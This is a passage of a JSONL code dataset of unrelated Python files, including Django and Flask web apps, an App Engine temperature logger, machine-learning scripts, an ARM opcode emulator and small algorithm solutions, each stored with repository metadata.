self.assertEqual(resp.status_code, 200)\n self.assertIn(self.mineral_one, resp.context['minerals'])\n self.assertTemplateUsed(resp, 'index.html')\n self.assertContains(resp, self.mineral_one.name)\n\n def 
test_mineral_detail_view(self):\n resp = self.client.get(reverse('minerals:detail', kwargs={'pk':self.mineral_one.pk}))\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(self.mineral_one, resp.context['mineral'])\n self.assertTemplateUsed(resp, 'minerals/mineral_detail.html')\n self.assertContains(resp, self.mineral_one.name)\n\n\n\n\n\n","sub_path":"minerals/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"19836417","text":"import cgi\nimport os\nimport jinja2\nimport webapp2\nimport uuid\nimport RequestSignature\nimport TemperatureDataModel\nimport datetime\nfrom google.appengine.ext import ndb\n\ntemplate_env = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.getcwd()))\n\nclass Index(webapp2.RequestHandler):\n def get(self):\n self.response.write('hello')\n\nclass ExportLast(webapp2.RequestHandler):\n def get(self):\n # get device id\n device_id = self.request.get('did')\n if (device_id == ''):\n self.error(400)\n self.response.write('ERROR: missing parameter device id did')\n return\n\n temperature = TemperatureDataModel.Temperature.temperatures_last( \\\n ndb.Key(\"Device\", device_id))\n \n if temperature == None:\n self.error(400)\n self.response.write('ERROR: wrong device id')\n return\n\n self.response.headers['Content-Type'] = 'text/plain'\n self.response.write(\"{0},{1}\\n\".format(temperature.timestamp.strftime('%Y-%m-%d %H:%M:%S'), \\\n temperature.temperature, \\\n )) \n\nclass ExportCSV(webapp2.RequestHandler):\n def get(self):\n # get device id\n device_id = self.request.get('did')\n if (device_id == ''):\n self.error(400)\n self.response.write('ERROR: missing parameter device id did')\n return\n\n start = self.request.get('start')\n end = self.request.get('end')\n hours = self.request.get('hours')\n\n if start != '' and end != '':\n try:\n start = datetime.datetime.strptime(start, '%Y-%m-%d')\n end = datetime.datetime.strptime(end, '%Y-%m-%d')\n except ValueError:\n self.error(400)\n self.response.write('ERROR: wrong dates')\n return\n\n temperature_list = TemperatureDataModel.Temperature.temperatures_by_device_date_filter( \\\n ndb.Key(\"Device\", device_id), \\\n start, \\\n end)\n else:\n temperature_list = TemperatureDataModel.Temperature.temperatures_by_device( \\\n ndb.Key(\"Device\", device_id))\n\n self.response.headers['Content-Type'] = 'text/plain'\n for temperature_data in temperature_list:\n self.response.write(\"{0},{1}\\n\".format(temperature_data.timestamp.strftime('%Y-%m-%d %H:%M:%S'), \\\n temperature_data.temperature, \\\n )) \n\nclass Save(webapp2.RequestHandler):\n def get(self):\n # get device id\n device_id = self.request.get('did')\n if (device_id == ''):\n self.error(400)\n self.response.write('ERROR: missing parameter device id did')\n return\n\n # get device secret\n device_list = TemperatureDataModel.Device.query(TemperatureDataModel.Device.device_id == device_id).fetch()\n if len(device_list) != 1:\n self.error(400)\n self.response.write('ERROR: wrong device id')\n return\n\n device = device_list[0]\n\n # get temperature\n temperature_param = self.request.get('t')\n if (temperature_param == ''):\n self.error(400)\n self.response.write('ERROR: missing parameter temperature t')\n return\n\n try:\n temperature = float(temperature_param)\n except ValueError:\n self.error(400)\n self.response.write('ERROR: temperature t is not number')\n return\n\n # get signature\n signature = self.request.get('sig')\n 
if (signature == ''):\n self.error(400)\n self.response.write('ERROR: missing parameter signature sig')\n return\n\n # check signature\n if (not RequestSignature.RequestSignature.check([device_id, temperature_param], device.secret, signature)):\n self.error(401)\n self.response.write('ERROR: wrong signature')\n return\n\n temperature_data = TemperatureDataModel.Temperature(parent = ndb.Key(\"Device\", device_id),\n temperature = temperature)\n\n temperature_data.put()\n\nclass Chart(webapp2.RequestHandler):\n def get(self):\n # get device id\n device_id = self.request.get('did')\n if (device_id == ''):\n self.error(400)\n self.response.write('ERROR: missing parameter device id did')\n return\n\n template = template_env.get_template('chart.html')\n\n temperature_list = TemperatureDataModel.Temperature.temperatures_by_device_since( \\\n ndb.Key(\"Device\", device_id), 24)\n\n chart_data = ''\n for temperature_data in temperature_list:\n chart_data += \"['{0}',{1}],\\n\".format(temperature_data.timestamp.strftime('%Y-%m-%d %H:%M'), \\\n temperature_data.temperature, \\\n )\n\n self.response.out.write(\n template.render({'chart_data' : chart_data}))\n\napplication = webapp2.WSGIApplication([\n ('/', Index),\n ('/save', Save),\n ('/export/csv', ExportCSV),\n ('/export/chart', Chart),\n ('/export/last', ExportLast),\n], debug=True)\n","sub_path":"AppEngine/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":5644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"32047981","text":"from __future__ import absolute_import, division, print_function\r\n\r\nimport os\r\n\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nfrom AI.FXTM_Predictor_RNN.LSTMVAE import SeqVAE\r\nfrom DataCookers.FXTMdataset import MarketDataGenerator\r\nimport tensorflow.python.keras as keras\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom datetime import datetime\r\n\r\nmfile = '.\\SavedModel\\VAE/VAE.h5'\r\nmfile_enc = '.\\SavedModel\\VAE\\VAE_encoder.h5'\r\nmfile_dec = '.\\SavedModel\\VAE\\VAE_decoder.h5'\r\nmfile_arch = '.\\SavedModel\\VAE\\VAE_arch.json'\r\nmfile_enc_arch = '.\\SavedModel\\VAE\\VAE_encoder_arch.json'\r\nmfile_dec_arch = '.\\SavedModel\\VAE\\VAE_decoder_arch.json'\r\nsummarydir = \".\\Summary\\VAE\"\r\n\r\ninput_dim = [16, 3, 1]\r\nencoder_layers = [400]\r\ndecoder_layers = [400, input_dim[1] * input_dim[2]]\r\nbatch_size = 32\r\nepoch = 10\r\nsymbol_list = [\"EURGBP\", \"EURUSD\", \"GBPUSD\"]\r\nlatent_dim = 30\r\n\r\ngen = MarketDataGenerator(0.8, 16, 8, batch_size, symbol_list, datetime(2019, 4, 20), num_samples=90000)\r\nwhole = gen.og_dataset\r\nwholeX, _ = gen.createTestData_nparray(whole, 16, 16)\r\nwholeX = np.expand_dims(wholeX,axis=-1)\r\nprint(wholeX.shape)\r\n\r\nvae = SeqVAE(input_dim, encoder_layers, decoder_layers, latent_dim)\r\nvae.compile(input_dim, keras.optimizers.adam(epsilon=0.0001))\r\n\r\nvae.model.load_weights(mfile)\r\nencoded = vae.encode(wholeX)\r\ndecoded = vae.decode(encoded)\r\npd.DataFrame(encoded).to_csv(\"./Datasets/3FXTM1M_exp_moving10_delta_norm_encoded.csv\")\r\ndecoded = np.reshape(decoded, newshape=[-1, input_dim[1] * input_dim[2]])\r\ntestX = np.reshape(whole, newshape=[-1, input_dim[1] * 
input_dim[2]])\r\n\r\n\r\nplt.plot(testX)\r\nplt.plot(decoded)\r\nplt.show()\r\n","sub_path":"AI/FXTM_Summarizer/VAEConverter.py","file_name":"VAEConverter.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"279754443","text":"from flask import request, redirect, render_template, url_for, Flask, flash\nimport pymysql \nfrom datetime import datetime\nfrom weather import naver_com, accuweather_com, msn_com\nfrom data_analize import analize\n\napp = Flask(__name__)\n\nconn = pymysql.connect(host='127.0.0.1', user='root', password='1234', db='tweather', charset='utf8')\ncurs = conn.cursor()\n\napp.debug = True\n@app.route('/')\ndef index():\n naver_com.naver_weather()\n accuweather_com.accuweather_com()\n #msn_com.msn_com()\n analize.start()\n measure = datetime.date(datetime.today()) # 측정날짜\n curs.execute('select * FROM naver WHERE measurement=%s',measure)\n naver_data = curs.fetchall()\n curs.execute('select * FROM accuweather WHERE measurement=%s',measure)\n accu_data = curs.fetchall()\n \"\"\" curs.execute('select * FROM msn WHERE measurement=%s',measure)\n msn_data = curs.fetchall() \"\"\"\n conn.commit()\n return render_template('index.html', naver_data=naver_data, accu_data=accu_data)\n\nif __name__ == \"__main__\":\n app.run()","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"562349644","text":"from django.db.models import Count\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n\nfrom apps.gcd.models import Publisher, Country, Series\nfrom apps.gcd.views import paginate_response\nfrom apps.projects.forms import ImprintsInUseForm\n\n\ndef series_with_both_notes(request):\n series = Series.objects.filter(deleted=False)\\\n .exclude(publication_notes='').exclude(notes='')\n vars = {\n 'heading': 'Series',\n 'search_item': 'With Publication Notes and Notes',\n 'item_name': 'series',\n 'plural_suffix': '',\n }\n\n return paginate_response(request, series,\n 'projects/series_with_both_notes.html', vars)\n\n\ndef imprints_in_use(request):\n \"\"\"\n This project is geared towards clearing out the old imprint field so we can\n either remove it or start over with a new 'imprint' concept with a consistent\n definition. 
For this we need a list of imprints in use that can be filtered\n and sorted by a few basic attributes.\n \"\"\"\n\n imprints = Publisher.objects.filter(deleted=0, is_master=0)\n\n qargs = {'deleted': 0, 'is_master': 0}\n qorder = ['series_count', 'parent__name', 'name']\n\n vars = {\n 'heading': 'Imprints',\n 'search_item': 'In Use',\n 'item_name': 'imprint',\n 'plural_suffix': 's',\n }\n\n if (request.GET):\n form = ImprintsInUseForm(request.GET)\n form.is_valid()\n if form.is_valid():\n data = form.cleaned_data\n\n # Extra filters\n if data['parent']:\n qargs['parent'] = data['parent']\n if data['parent_country']:\n qargs['parent__country'] = data['parent_country']\n if data['imprint_country']:\n qargs['country'] = data['imprint_country']\n\n # Override order\n if data['order1'] or data['order2'] or data['order3']:\n qorder = []\n if data['order1']:\n qorder.append(data['order1'])\n if data['order2']:\n qorder.append(data['order2'])\n if data['order3']:\n qorder.append(data['order3'])\n else:\n form = ImprintsInUseForm(auto_id=True,\n initial=dict(zip(('order1', 'order2', 'order3'), qorder)))\n\n imprints = imprints.filter(**qargs).order_by(*qorder)\n vars['form'] = form\n\n return paginate_response(request, imprints,\n 'projects/imprints_in_use.html', vars)\n\n","sub_path":"branches/0.4-little-nemo/pydjango/apps/projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"339782478","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 9 22:15:47 2020\n\n@author: mofarrag\n\"\"\"\nfrom IPython import get_ipython\nget_ipython().magic(\"reset -f\")\n# import os\n# os.chdir(\"\")\nimport geopandas as gpd\nimport numpy as np\nimport pandas as pd\nimport Hapi.inputs as IN\n\n# BasinF = \"F:/02Case studies/Coello/base_data/GIS/delineation/features/basins.shp\"\nBasinF = \"F:/02Case studies/Coello/base_data/GIS/GIS/BasinExtractParameters.shp\"\nParametersPath = \"F:/01Algorithms/HAPI/Hapi/Parameters\"\nSaveTo = \"F:/02Case studies/Coello/Hapi/Data/00inputs/Basic_inputs\"\n#%%\nBasin = gpd.read_file(BasinF)\n# parameters name with the same order inside the Input module\nind = [\"tt\",\"sfcf\",\"cfmax\",\"cwh\",\"cfr\",\"fc\",\"beta\",\"lp\",\"k0\",\"k1\",\"k2\",\"uzl\",\"perc\",\"maxbas\"]\nPar = pd.DataFrame(index = ind)\n# extract parameters boundaries\nPar['UB'], Par['LB'] = IN.ExtractParametersBoundaries(Basin)\n# extract parameters in a specific scenarion from the 10 scenarios\nPar['1'] = IN.ExtractParameters(Basin,\"10\")\n\"\"\"\nzoom to the place where the catchment exist to check if the basin polygon overlay\nthe right location, if not there is a problem in the coordinate reference system\ntransformation\n\"\"\"\n#%% save the parameters\nPar['UB'].to_csv(SaveTo + \"/UB-Extracted.txt\", header=None)\nPar['LB'].to_csv(SaveTo + \"/LB-Extracted.txt\", header=None)\nPar['1'].to_csv(SaveTo + \"/scenario10.txt\", header=None)\n","sub_path":"Examples/Create Inputs/ExtractParametersBounds.py","file_name":"ExtractParametersBounds.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"596737476","text":"from armulator.armv6.bits_ops import substring, set_substring, lower_chunk\nfrom armulator.armv6.opcodes.opcode import Opcode\n\n\nclass Uadd16(Opcode):\n def __init__(self, instruction, m, d, n):\n super().__init__(instruction)\n self.m = m\n self.d = d\n self.n = n\n\n 
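# UADD16 adds the two 16-bit halfword lanes of Rn and Rm independently;\n    # a lane sum of 0xFFFF + 0x0001 wraps to 0x0000, and the GE flags below\n    # record the per-lane carry-out (sum >= 0x10000) for use by a later SEL\n    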
def execute(self, processor):\n if processor.condition_passed():\n n = processor.registers.get(self.n)\n m = processor.registers.get(self.m)\n sum1 = substring(n, 15, 0) + substring(m, 15, 0)\n sum2 = substring(n, 31, 16) + substring(m, 31, 16)\n d = set_substring(0, 15, 0, lower_chunk(sum1, 16))\n d = set_substring(d, 31, 16, lower_chunk(sum2, 16))\n processor.registers.set(self.d, d)\n ge = 0b11 if sum1 >= 0x10000 else 00\n ge = set_substring(ge, 3, 2, 0b11 if sum2 >= 0x10000 else 00)\n processor.registers.cpsr.ge = ge\n","sub_path":"armulator/armv6/opcodes/abstract_opcodes/uadd16.py","file_name":"uadd16.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"465641031","text":"import numpy as np\nfrom numpy import exp, log, pi, sqrt, abs, tanh, arctan\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfig = plt.figure()\n# ax = fig.add_subplot(111, projection='3d')\n\nLambda = 1/2\nx1 = 1\nx2 = 3\n\n@np.vectorize\ndef T(th):\n if th <= 0:\n return Lambda*th\n else:\n return Lambda*(1-exp(-th))\n\ndef S(th):\n # return Lambda*th/sqrt(1+th**2)\n return Lambda*(exp(th)-1)/(exp(th)+1)\n # return Lambda*(th/(1+abs(th)))\n # return Lambda*(2/pi*arctan(pi/2*th))\n\ndef Y(x):\n e = exp(x) - K\n if e > 0:\n return e\n else:\n return 0\n\n# th1 = np.linspace(-0.5, 2)\n# th2 = np.linspace(0.001, 1)\n# th1, th2 = np.meshgrid(th1, th2)\n# z = exp(-th1*x1-T(th2*x2)*x2+th1**2/2)*Lambda/(Lambda-T(th2))\n# ax.plot_surface(th1, th2, z)\n# ax.set_xlabel('th1')\n# ax.set_ylabel('th2')\n\n# th2 = np.linspace(0,3)\nth2 = np.linspace(-20, 5)\ny = [exp(-S(th)*x2 - Lambda*x2)*Lambda/(Lambda-S(th)) for th in th2]\n# y = [-Lambda*th/(1+th)*x2+log(1+th) for th in th2]\n# y = [2*(exp(th)-1)/(exp(th)+1) for th in th2]\n# y = [1-exp(-th) for th in th2]\n# y = [-T(th)*x2+log(Lambda/(Lambda-T(th))) for th in th2]\n# y = [-S(th)*x2+log(Lambda/(Lambda-S(th))) for th in th2]\n# y = [th**2 for th in th2]\nplt.plot(th2, y)\n# y = [exp(2*th) for th in th2]\n# plt.plot(th2, y)\n# y = [exp(th) for th in th2]\n# plt.plot(th2, y)\n\n\nplt.show()\n","sub_path":"convexplot.py","file_name":"convexplot.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"329821796","text":"import cv2\nimport numpy as np\nimport time\nfrom scipy.stats import skew\nfrom scipy.spatial import distance as dist\n\n\ndef LoadImage(path, size=(320, 320)):\n img = cv2.imread(path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, size)\n return img\n\ndef GetMatchDistance(Features):\n\t'''\n\tGet Matches of features using flann based matcher\n\tInputs:\n\t\tFeatures: List of features of images\n\tOutputs:\n\t\tMatches: Number of matches that passed Lowe's ratio test, multiplied by -1 \n\t'''\n\tMatches = np.zeros((len(Features), len(Features)), np.float32)\n\tfor i in range(len(Features)):\n\t\tfor j in range(i, len(Features)):\n\t\t\tFeature_i, Feature_j = Features[i], Features[j]\n\t\t\tif (Feature_i is None) or (Feature_j is None):\n\t\t\t\tMatches[i, j] = 0\n\t\t\t\tcontinue\n\t\t\tif min(len(Feature_i), len(Feature_j)) < 2:\n\t\t\t\tMatches[i, j] = 0\n\t\t\t\tcontinue\n\t\t\tFLANN_INDEX_KDTREE = 1\n\t\t\tindex_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)\n\t\t\tsearch_params = dict(checks=50)\n\t\t\tflann = cv2.FlannBasedMatcher(index_params, search_params)\n\t\t\tmatches = flann.knnMatch(Feature_i, Feature_j, 
k=2)\n\t\t\t# Apply ratio test\n\t\t\tratio = 0.75\n\t\t\tgood_matches = [m1 for m1, m2 in matches if m1.distance < ratio * m2.distance]\n\t\t\tif len(good_matches) == 0:\n\t\t\t\tMatches[i, j] = 0\n\t\t\telse:\n\t\t\t\tMatches[i, j] = len(good_matches)\n\tMatches = -(Matches + Matches.T)\n\treturn Matches\n\ndef GetMAP(Features, Id2Label, Metrics, Weights=None):\n\t'''\n\tCalculate overall MAP with leave 1 out fashion\n\tInputs:\n\t\tFeatures: List of features of images\n\t\tId2Label: A dictionary that maps id to label\n\t\tMetrics: List of metrics for calculating distance\n\t\tWeights: Weight for each feature\n\tOutputs:\n\t\tMAP: Overall MAP\n\t\tCMAP: Category MAP\n\t'''\n\tSumAP = 0.0\n\tCategoryAP = {}\n\tNumofFeatures = len(Features)\n\tNumofImages = Features[0].shape[0]\n\n\t# Get Distance\n\tDistances = np.zeros((NumofFeatures, NumofImages, NumofImages), np.float32)\n\tfor n in range(NumofFeatures):\n\t\tCurFeature = Features[n]\n\t\tif Metrics[n] == 'match':\n\t\t\tDistance_ = GetMatchDistance(CurFeature)\n\t\t\tDistances[n] = Distance_\n\t\telif len(CurFeature.shape) == 2:\n\t\t\tDistance_ = dist.squareform(dist.pdist(CurFeature, metric=Metrics[n]))\n\t\t\tDistances[n] += Distance_\n\t\telif len(CurFeature.shape) == 3:\n\t\t\tfor i in range(CurFeature.shape[1]):\n\t\t\t\tDistance_ = dist.squareform(dist.pdist(CurFeature[:,i,:], metric=Metrics[n]))\n\t\t\t\tDistances[n] += Distance_\n\n\t# Normalize each feature distance\n\tfor i in range(NumofFeatures):\n\t\tD = Distances[i]\n\t\tMean = np.mean(D, axis=1)\n\t\tVar = np.var(D, axis=1)\n\t\tDistances[i] = ((D.T - Mean) / Var).T\n\n\t# Apply weight to each distance\n\tif Weights is None:\n\t\tDistance = np.sum(Distances, axis=0)\n\telse:\n\t\tDistance = np.zeros((NumofImages, NumofImages), np.float32)\n\t\tfor i in range(NumofFeatures):\n\t\t\tDistance += Distances[i] * Weights[i]\n\t\n\t# Calculate MAP\n\tfor i in range(NumofImages):\n\t\tTargetLabel = Id2Label[i]\n\t\tRank = np.argsort(Distance[i])\n\t\tTP = 0.0\n\t\tSumPrecision = 0.0\n\t\tfor j in range(1, NumofImages):\n\t\t\tId = Rank[j]\n\t\t\tif Id2Label[Id] == TargetLabel:\n\t\t\t\tTP += 1.0\n\t\t\t\tSumPrecision += TP / j\n\t\tAP = SumPrecision / TP\n\t\tSumAP += AP\n\t\tif TargetLabel in CategoryAP:\n\t\t\tCategoryAP[TargetLabel].append(AP)\n\t\telse:\n\t\t\tCategoryAP[TargetLabel] = [AP]\n\tMAP = SumAP / NumofImages\n\tCMAP = {}\n\tfor Label in CategoryAP:\n\t\tCMAP[Label] = sum(CategoryAP[Label]) / len(CategoryAP[Label])\n\treturn MAP, CMAP\n\ndef GetFeatures(FeatureDatabase, FeatureNames):\n\t'''\n\tGet features from FeatureDatabase\n\tInputs:\n\t\tFeatureDatabase: The feature database\n\t\tFeatureNames: List of feature names\n\tOutputs:\n\t\tFeatures: The desired features\n\t\tId2Label: A dictionary that maps id to label\n\t\tId2Image: A dictionary that maps id to image\n\t'''\n\tId2Label = {}\n\tId2Image = {}\n\tFeatures = [[] for _ in range(len(FeatureNames))]\n\tId = 0\n\tfor Label in FeatureDatabase:\n\t\tfor Image in FeatureDatabase[Label]:\n\t\t\tfor i in range(len(FeatureNames)):\n\t\t\t\tFeatures[i].append(Image[FeatureNames[i]])\n\t\t\tId2Label[Id] = Label\n\t\t\tId2Image[Id] = Image['RGB']\n\t\t\tId += 1\n\tFeatures = [np.array(x) for x in Features]\n\treturn Features, Id2Label, Id2Image\n\ndef RunExperiment(FeatureDatabase, FeatureList, MetricList, WeightList=None):\n\t'''\n\tRun Experiment and print MAP, best 2 category & worst 2 category\n\tInputs:\n\t\tFeatureDatabase: The feature database\n\t\tFeatureList: List of feature names (key for 
FeatureDatabase)\n\t\tMetricList: List of distance metrics for each feature\n\t\tWeightList: Weight for each feature, if None, simply sum up all metrics\n\tOutputs:\n\t\tNone\n\t'''\n\t# Check if the arguments are valid\n\tif len(FeatureList) != len(MetricList):\n\t\tprint(\"ERROR: FeatureList is not the same length of MetricList\")\n\t\treturn\n\tif WeightList is not None:\n\t\tif len(FeatureList) != len(WeightList):\n\t\t\tprint(\"ERROR: FeatureList is not the same length of WeightList\")\n\t\t\treturn\n\n\tStartTime = time.time()\n\tFeatures, Id2Label, Id2Image = GetFeatures(FeatureDatabase, FeatureList)\n\tMAP, CMAP = GetMAP(Features, Id2Label, Metrics=MetricList, Weights=WeightList)\n\tTime = time.time() - StartTime\n\tprint(\"MAP: %8f - Time: %8fs\" % (MAP, Time))\n\tLabels = []\n\tCMAPs = []\n\tfor Label in CMAP:\n\t    Labels.append(Label)\n\t    CMAPs.append(CMAP[Label])\n\tLabels = np.array(Labels)\n\tCMAPs = np.array(CMAPs)\n\tRank = np.argsort(CMAPs)\n\tprint(\"Best: %s(%8f)\" % (Labels[Rank[-1]], CMAPs[Rank[-1]]), end=\"\")\n\tprint(\", %s(%8f)\" % (Labels[Rank[-2]], CMAPs[Rank[-2]]))\n\tprint(\"Worst: %s(%8f)\" % (Labels[Rank[0]], CMAPs[Rank[0]]), end=\"\")\n\tprint(\", %s(%8f)\" % (Labels[Rank[1]], CMAPs[Rank[1]]))\n\treturn ","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"76419694","text":"# Recommended: do not run this from IDLE\nimport pyautogui\nprint('Press Ctrl+C to quit the program! ')\ntry:\n    while True:\n        # get and print the current mouse coordinates\n        x,y = pyautogui.position()\n        positionStr = 'X:' + str(x).rjust(4) + ' Y:' + str(y).rjust(4)\n        # get the RGB value of the pixel at the current mouse position\n        pixelColor = pyautogui.screenshot().getpixel((x, y))\n        positionStr += '\\tRGB: (' + str(pixelColor[0]).rjust(3) + ', ' + str(pixelColor[1]).rjust(3) + ', ' + str(pixelColor[2]).rjust(3) + ')'\n\n        print(positionStr, end='\\r')\n    \nexcept KeyboardInterrupt:\n    print('\\nDone!')","sub_path":"ComputerAndNetwork/Languages/Python/第三方模块/GUI自动化/pyautogui/获取鼠标位置的坐标及RGB值.py","file_name":"获取鼠标位置的坐标及RGB值.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"314744605","text":"#!/usr/bin/env python\n# This software may be used and distributed according to the terms of the\n# GNU General Public License version 2 or any later version.\n\nimport os\n\nOUR_DIR = os.path.normpath(os.path.dirname(__file__))\nexecfile(os.path.join(OUR_DIR, '..', '..', '..', 'bootstrap.py'))\n\napplication = make_application(OUR_DIR)\n","sub_path":"hgwsgi/releases/l10n/mozilla-aurora/hgweb.wsgi","file_name":"hgweb.wsgi","file_ext":"wsgi","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"290742650","text":"# coding: utf-8\n\nimport torch.nn as nn\n\nclass Net(nn.Module):\n    def __init__(self):\n        super(Net, self).__init__()\n        self.conv1 = nn.Conv2d(3,3,3)\n        self.maxpool1 = nn.MaxPool2d(kernel_size= 2)\n        self.relu1 = nn.ReLU(inplace= True)\n        \n        self.conv2 = nn.Conv2d(3,6,3)\n        self.maxpool2 = nn.MaxPool2d(kernel_size= 2)\n        self.relu2 = nn.ReLU(inplace= True)\n        \n        self.fc1_1 = nn.Linear(6 * 30 * 30, 150)\n        self.relu3_1 = nn.ReLU(inplace= True)\n        self.fc1_2 = nn.Linear(6 * 30 * 30, 150)\n        self.relu3_2 = nn.ReLU(inplace= True)\n        \n        self.drop_1 = nn.Dropout(p = 0.5)\n        self.drop_2 = nn.Dropout(p = 0.5)\n        \n        self.fc2_1 = nn.Linear(150,2)\n        self.fc2_2 = nn.Linear(150,3)\n        \n        self.softmax_1 = nn.Softmax(dim = 1)\n        
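# second head: forward() below returns two predictions, a 2-way \"class\"\n        # output and a 3-way \"species\" output, each with its own softmax\n        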
self.softmax_2 = nn.Softmax(dim = 1)\n    \n    def forward(self, x):\n        x = self.conv1(x)\n        x = self.maxpool1(x)\n        x = self.relu1(x)\n        \n        x = self.conv2(x)\n        x = self.maxpool2(x)\n        x = self.relu2(x)\n        \n        x = x.view(-1, 6 * 30 * 30)\n        \n        x_class = self.fc1_1(x)\n        x_class = self.relu3_1(x_class)\n        x_class = self.drop_1(x_class)\n        \n        x_class = self.fc2_1(x_class)\n        x_class = self.softmax_1(x_class)\n        \n        x_species = self.fc1_2(x)\n        x_species = self.relu3_2(x_species)\n        x_species = self.drop_2(x_species)\n        \n        x_species = self.fc2_2(x_species)\n        x_species = self.softmax_2(x_species)\n        return x_class, x_species\n\n","sub_path":"project1_classification/stage_3/Network_Classes.py","file_name":"Network_Classes.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"302488424","text":"from flask_restful import Resource\nfrom flask import jsonify, request\nimport uuid\n\nVEGETABLES = [\n    {\n        'id': uuid.uuid4().hex,\n        'name': 'carrot',\n        'color': 'orange'\n    },\n    {\n        'id': uuid.uuid4().hex,\n        'name': 'tomato',\n        'color': 'red'\n    },\n    {\n        'id': uuid.uuid4().hex,\n        'name': 'cucumber',\n        'color': 'green'\n    },\n    {\n        'id': uuid.uuid4().hex,\n        'name': 'cauliflower',\n        'color': 'various'\n    },\n]\n\n\nclass Vegetables(Resource):\n    @staticmethod\n    def get():\n        return jsonify({\n            'status': 'success',\n            'vegetables': VEGETABLES\n        })\n\n    @staticmethod\n    def post():\n        response_object = {'status': 'success'}\n        post_data = request.get_json()\n        VEGETABLES.append({\n            'id': uuid.uuid4().hex,\n            'name': post_data.get('name'),\n            'color': post_data.get('color')\n        })\n        response_object['message'] = 'Vegetable added!'\n        return jsonify(response_object)\n\n    @staticmethod\n    def remove_vegetable(vegetable_id):\n        for vegetable in VEGETABLES:\n            if vegetable['id'] == vegetable_id:\n                VEGETABLES.remove(vegetable)\n                return True\n        return False\n\n    @staticmethod\n    def put(vegetable_id):\n        response_object = {'status': 'success'}\n        post_data = request.get_json()\n        print(vegetable_id)\n        print(post_data)\n        Vegetables.remove_vegetable(vegetable_id)\n        VEGETABLES.append({\n            'id': uuid.uuid4().hex,\n            'name': post_data.get('name'),\n            'color': post_data.get('color')\n        })\n        response_object['message'] = 'Vegetable updated!'\n        return jsonify(response_object)\n\n    @staticmethod\n    def delete(vegetable_id):\n        response_object = {'status': 'success'}\n        Vegetables.remove_vegetable(vegetable_id)\n        response_object['message'] = 'Vegetable removed!'\n        return jsonify(response_object)\n","sub_path":"HomeWorks/HW9/vegetables/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"441325175","text":"import sys\n\nimport setuptools\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\n\n\nclass PyTest(TestCommand):\n    user_options = [('pytest-args=', 'a', \"Arguments to pass to py.test\")]\n\n    def initialize_options(self):\n        TestCommand.initialize_options(self)\n        self.pytest_args = []\n\n    def finalize_options(self):\n        TestCommand.finalize_options(self)\n        self.test_args = []\n        self.test_suite = True\n\n    def run_tests(self):\n        # import here, cause outside the eggs aren't loaded\n        import pytest\n        errno = pytest.main(self.pytest_args)\n        sys.exit(errno)\n\n\nsetup(\n    name='Autowire',\n    packages=setuptools.find_packages(exclude=['tests']),\n    version='0.3.5',\n    description=\"Simple dependency injection.\",\n    author='Geonu Choi',\n    
author_email='6566gun@gmail.com',\n url='https://github.com/hardtack/autowire',\n license='MIT LICENSE',\n keywords=['dependency-injection'],\n # Cmd\n cmdclass={\n 'test': PyTest,\n }\n)\n","sub_path":"pypi_install_script/Autowire-0.3.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"127873339","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nclass Solution(object):\n def removeDuplicates(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if nums == []: return 0\n current = nums[0]\n tail = 1\n for ele in nums[1:]:\n if current != ele:\n current = nums[tail] = ele\n tail += 1\n #print(nums[:tail])\n return tail","sub_path":"Week_01/remove_duplicates_from_sorted_array.py","file_name":"remove_duplicates_from_sorted_array.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"531536755","text":"from collections import deque\n\n\ndef bfs(x):\n queue = deque()\n queue.append((x, 0))\n visit = [-1 for _ in range(n)]\n visit[x] = 0\n\n while queue:\n x, cnt 